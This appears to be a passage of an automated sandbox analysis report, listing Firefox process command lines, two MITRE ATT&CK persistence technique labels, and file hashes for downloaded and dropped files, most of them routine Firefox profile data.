    C:\Program Files\Mozilla Firefox\firefox.exe (PID 5108): "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.3.2070104747\1435855234" -childID 2 -isForBrowser -prefsHandle 3468 -prefMapHandle 3464 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {983eae45-a8c1-485a-ab64-8acb273d356e} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 3480 1ab8b596e58 tab
    C:\Program Files\Mozilla Firefox\firefox.exe (PID 4692): "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.4.1196788143\52312921" -childID 3 -isForBrowser -prefsHandle 3968 -prefMapHandle 3964 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6ae0b952-f8e7-4d5f-8d3e-ff8c45350cbe} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 3980 1ab8bf53158 tab
    C:\Program Files\Mozilla Firefox\firefox.exe (PID 5176): "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.7.106175146\1315165128" -childID 6 -isForBrowser -prefsHandle 5172 -prefMapHandle 5176 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {132b0063-ff9f-43ae-acfc-24fe650881b5} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 5164 1ab8d6d7558 tab
    C:\Program Files\Mozilla Firefox\firefox.exe (PID 3928): "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.6.482119680\636777080" -childID 5 -isForBrowser -prefsHandle 4976 -prefMapHandle 4980 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {143ea3ff-f4ed-4ad2-ab22-0939cf1a1d32} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 4968 1abff4bee58 tab
    C:\Program Files\Mozilla Firefox\firefox.exe (PID 5516): "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.5.1587135705\285574710" -childID 4 -isForBrowser -prefsHandle 4824 -prefMapHandle 4820 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {99151f20-93da-4e53-b8aa-74d979fcb956} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 4836 1abfbe5f558 tab
    C:\Program Files\Mozilla Firefox\firefox.exe (PID 6036): "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.8.1629871287\898279998" -childID 7 -isForBrowser -prefsHandle 5596 -prefMapHandle 5636 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e981d2b6-1fac-43d7-ba4d-5e10004937d2} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 5624 1ab8f21dd58 tab
Network
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution (1)
    Winlogon Helper DLL (1)
  Create or Modify System Process (1)
    Windows Service (1)
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Winlogon Helper DLL (1)
  Create or Modify System Process (1)
    Windows Service (1)
Downloads
-
Filesize: 446B
MD5: 5ec70c63f923df3d7138b320b148bc8b
SHA1: 657a2e7b2733b9086d6f727a8b0a29551d66f49b
SHA256: 014cf5109357d670105e4cb1a782168fbfaa778e62342d32b545a60286db33dc
SHA512: 249552eb21e52562bb8516a68a29eb05e5db752e6acabe91c045c4395cf3c6661c2f23e8caffad0284be71439e2a0b83d11c3b8a7a6b895122c50deea3844267
-
Filesize: 3KB
MD5: 8592ba100a78835a6b94d5949e13dfc1
SHA1: 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256: fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512: 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize: 1KB
MD5: dcdb2107d1c46a960e5d69c723519b65
SHA1: e49c18e3720629173e103c5749d328c6a9038b43
SHA256: 2b40dd02b90e4b9051c3b0c6fc7a5c2e3d3d1a86eb70fe9557544ed1be6f47e9
SHA512: da60223e5a0a96f6e69b17a55eccab4ad8304d72b87a5616ce819226e7f5027cc30e62170287ab71d248f70779c72efe805f551deadb91d3a51231afd170aac5
-
Filesize: 1KB
MD5: 296db004842caa6cb926635ce70ad244
SHA1: 4092bdb91456ea49cc17021dbd27531fd6d84f62
SHA256: 86b9a02feaf35e40d4b34815bffd6754a71306773167cd0c3d56d36b3b46d9b4
SHA512: 8ae781cb761a71ef1f29e5410cb0cbbf832a6379b4eae6f5684b058c747324e551e5b3ade23d016a3aa2d20ae7019db5b1eecb073326acd3f4d6cc22df9a9164
-
Filesize: 1KB
MD5: b8a1aa439f8f2cb07e181a4914859213
SHA1: 9723021287ab8cccb2062a10c2f56ae340ae99f3
SHA256: a0df26180411ebc7aebc1ea2ec044f71b8f34644b42ff3db2929633383c7c87e
SHA512: 4898edab373285a641241144b4d3f72bd3361ad3becc7f0fcc8652e2c301bf0f882a093c89db4c0f82dd5a73dc3ec25bd0df3ef13c254e3a34723d4fe5cd3035
-
Filesize: 1KB
MD5: 98f6ad48086a4049fb5b7dcc4db83d46
SHA1: 997cf86ac407623a0bc5586088500f90bfb3c8be
SHA256: 04c52a46f8ca2aec554262f16dae9ae0d5d9bfe98a50cab71bbb44d6e4e856a0
SHA512: 58647c7c2b5c3b7a4bf7360f231c1248351d1f881f74f33d39c214d1da5d27c7eef66458976695c9db35e48f2fbfa95e33db645934fadb5cfdbe9bc25e549234
-
Filesize: 1KB
MD5: 4369c9914b0a76900e5b017c5bb78e48
SHA1: 9dbacd105b3adcfd52cfa805dd94b3ddef702773
SHA256: ac2a23086677c45f31b3a3d2a0e0b6feb2853edd8f1c2dcef4757047ff3ba1a4
SHA512: 3682d05005310d5fd9b4a3b82c93f7ff4a7e3d4ca56a7d3ae88a3343cbfe0034ffa1c3b128efdc7fb360f3bb82991f9ad3da6d994058a8cc8bd16fe23c7e328e
-
Filesize: 1KB
MD5: ed2215784ae7fe57be75213e07b67191
SHA1: 0edaf02636b993c8f93afe821013537e59489350
SHA256: bf4127beabb53610bc46f3e702675651fbc25994076cf77a27429233fafc6086
SHA512: 25427e13b04ac1e14bd962276202503be8ae0fc9e7dc025006d84b65ec36177a1040195596feb6410025d6aa510d71f36a465b043a029121e58f5e09ab7a09aa
-
Filesize: 1KB
MD5: 50be382e5e3d1e6c9d28d026c2d22a00
SHA1: 55029a5da5196c017d0d2f5c84af5c5b8dbc9044
SHA256: bc4a26ed0022360d70d4c453c7f33aceaaba3df14bafa20f5b50ee42172dd7fc
SHA512: 996730b74e0dca1e5f2a5dca6c615fc64b0de6660d361b548ac7161a63ce78e2f4e3e3a2f1bf591865dabd9e9dd8b0c876d677e80091d9e0ceadb324422fec59
-
Filesize: 1KB
MD5: 4ba8c095dbf30fc4069af5bf36b60578
SHA1: 01e01c2a73acc4e5963a5f7ded36224ea9074f69
SHA256: 76f40008c72222ff3c734528ee15e09da3c66e236cd88214b49fbdca1c46e6ea
SHA512: ddd3fc3892ac0a1bd2297d89210bf008912769e45f43c87fab23f3ab918f9745ee0376873d9789ccf40b75038e4f2c7fecc2bb6ac8fca0b1338abe112c49f1df
-
Filesize: 1KB
MD5: 176b49b2c9b018cf4e280820e9fb257d
SHA1: 0c5506c5e30d4161e8308d49280c50c9f93ecbd0
SHA256: 4d92432af5b1f61ae55d6a1a7f1b48e4b67bcedfbcd9bf6899031a9028926966
SHA512: 159c1b5663941d7b206fdfa344a14d7236c133c27aef6a1a47be5692619704835306f1a71b142a10c096e10a96f8953b019323028ef1448c1e955a28a34b725c
-
Filesize: 1KB
MD5: d122f6fcd37703f166c3dccdf9a749b1
SHA1: e581b2171dcd70e879c643db9894d1ce7cbe41cb
SHA256: 272bcdd6c5b62dce7bc03b735ea1d106738c27f3690a8b520b572cb011218b7e
SHA512: 61f2a0cc6cef40de2d86daae97e998648b6393524952d81339415a9f04e1248ba86692e2b2b494b4a704e5eccde1c0a8d5858a7e9043683dccf39510d0e997cb
-
Filesize: 1B
MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize: 442KB
MD5: 85430baed3398695717b0263807cf97c
SHA1: fffbee923cea216f50fce5d54219a188a5100f41
SHA256: a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512: 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
Filesize: 8.0MB
MD5: a01c5ecd6108350ae23d2cddf0e77c17
SHA1: c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256: 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512: b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\datareporting\glean\db\data.safe.bin
Filesize: 9KB
MD5: 548635e61302f2cee7c6493a70b97bd2
SHA1: e92dd65b16cf55528ed952072d0827e16426a816
SHA256: 390c33ea484334323720a48249bb9aec7a4b9fadd577665ddcb0b81552f0a3bc
SHA512: 7952bff5755ac1d2b53965a251c11795826c37b8f3c247cfe943ee4100d6847677610a63e42e9f83c7fa05535d3c602246d75dc0f2d8fa131be77c96996ebe08
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\datareporting\glean\pending_pings\7d09eec9-2c5a-48c9-9356-417cc8db208f
Filesize: 734B
MD5: 7f67455097bbbe0bd8e69c4b559ca3c6
SHA1: eeede5f5b2bb049f9a82200610ce3e610501be23
SHA256: d0c0cfa8c4ac915dd12ce0bc1d269721d8ae7441396016725f14afbaa3822d0a
SHA512: c3f33493540213c869c7fb80827343c8195f775a376ad10e6b875497835cc89e56ada5671fb9e4b539470aa6e6578152216dc8a0131d019e20ce3a52bd471194
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
Filesize: 997KB
MD5: fe3355639648c417e8307c6d051e3e37
SHA1: f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256: 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512: 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
Filesize: 116B
MD5: 3d33cdc0b3d281e67dd52e14435dd04f
SHA1: 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256: f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512: a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
Filesize: 479B
MD5: 49ddb419d96dceb9069018535fb2e2fc
SHA1: 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256: 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512: 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
Filesize: 372B
MD5: 8be33af717bb1b67fbd61c3f4b807e9e
SHA1: 7cf17656d174d951957ff36810e874a134dd49e0
SHA256: e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512: 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
Filesize: 11.8MB
MD5: 33bf7b0439480effb9fb212efce87b13
SHA1: cee50f2745edc6dc291887b6075ca64d716f495a
SHA256: 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512: d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize: 1KB
MD5: 688bed3676d2104e7f17ae1cd2c59404
SHA1: 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256: 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512: 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize: 1KB
MD5: 937326fead5fd401f6cca9118bd9ade9
SHA1: 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256: 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512: b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
-
Filesize: 6KB
MD5: d0f2727376396f1c5e462b9eec104f60
SHA1: c712d913a5c26f6115629e7965df831dc185c69f
SHA256: 4e706b46886f8986d3c606d04172603d6a79a67015216e07a5748831710232f6
SHA512: eb3bd0b8df9c0af655e28e1b81bd2b16ffa065b5cbf2219eccc2d99886212e06f34a42dc419aa80c4a5c20b55485d1f7a8a5598f4198322530bb5c63381fb9a2
-
Filesize: 6KB
MD5: a66c8c11930cb9353c684dbb495adedc
SHA1: af66b358286c257f26df5239c7c2f7c576799555
SHA256: fc1d5b2d69c2e9846c71c10f83fe57842f8ffaddeea181852f5746427445eaf6
SHA512: 1d9674eb1ea5aa506a1bcc694af60197f26310e8b7b71c3dfc3a8a228737b81097891725cd7933d61e2d5c2ec44566718e675a41514119e92600e831598f9657
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\sessionstore-backups\recovery.jsonlz4
Filesize: 3KB
MD5: 296c5b6e66f13c86d9bafa00452077e7
SHA1: d9c164beadcb54b56aa7d82d3f27e93f4d5efcef
SHA256: ea30c5b559a84530768693deea1c9a8bc1d2b299007619562f4fb1dc38fe122a
SHA512: 1a6d1e4f931dd7bc59bf93bbadde8c248acad2a27c9e46effe54c6ded5d6f69d5eff990c1f426a8d7036c5d6f1741a1f50fe58eeed20b31cba751b22641586f2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\sessionstore-backups\recovery.jsonlz4
Filesize: 4KB
MD5: 219799a85707d3f741163427ae2890df
SHA1: 41ab76829421a2e78def384e0ce6a73730ecc6ae
SHA256: 1cda5c7dea57f217d776c0e6ea5e206f7b29e09b100b98bdb74fc0ba9bc36f7a
SHA512: 21ce57917016e81d571abfbbfc60b91dcc5c90d6f843a47933d4ad4300531578872c29825a899b285141284a88b8a7abb33106b4a322cb56e32332c49971c313
-
Filesize: 1KB
MD5: 6ba5f129601ccdb9db83c09c019bcc41
SHA1: 28ee2d24bceccb2a558f4c457c3eed7ae46dae0d
SHA256: 8fda1fa2f4f670ebfb0532ceec094a5543e9999d012bf1f28f496b9f6229a661
SHA512: d7a9c40d25054b6f2be08c06c3801d7d716571a248aee1f5fe966a554f682d9d5308815b84f44877d00b58a078a0ee88467576acdcc04c5a365206b7fe879cb8